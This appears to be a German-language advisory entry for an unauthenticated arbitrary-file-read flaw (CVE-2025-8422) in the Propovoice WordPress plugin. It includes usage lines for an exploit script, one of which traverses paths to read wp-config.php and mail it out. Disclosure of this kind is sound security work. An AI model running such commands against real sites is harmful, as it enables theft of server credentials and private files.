
Propovoice <= 1.7.6.7 - Nicht authentifiziertes beliebiges Dateilesen
Propovoice <= 1.7.6.7 - Nicht authentifiziertes beliebiges Dateilesen
Das Propovoice: All-in-One Client Management System Plugin für WordPress ist in allen Versionen bis einschließlich 1.7.6.7 anfällig für beliebiges Dateilesen über die Funktion send_email(). Dies ermöglicht es nicht authentifizierten Angreifern, den Inhalt beliebiger Dateien auf dem Server zu lesen, die vertrauliche Informationen enthalten können.
Verwendung: python3 cve-2025-8422-exploit.py <Ziel-URL> <E-Mail-Empfänger> [Zieldatei]
Beispiele:
python3 cve-2025-8422-exploit.py https://example.com [email protected]
python3 cve-2025-8422-exploit.py https://example.com [email protected] /../../../wp-config.php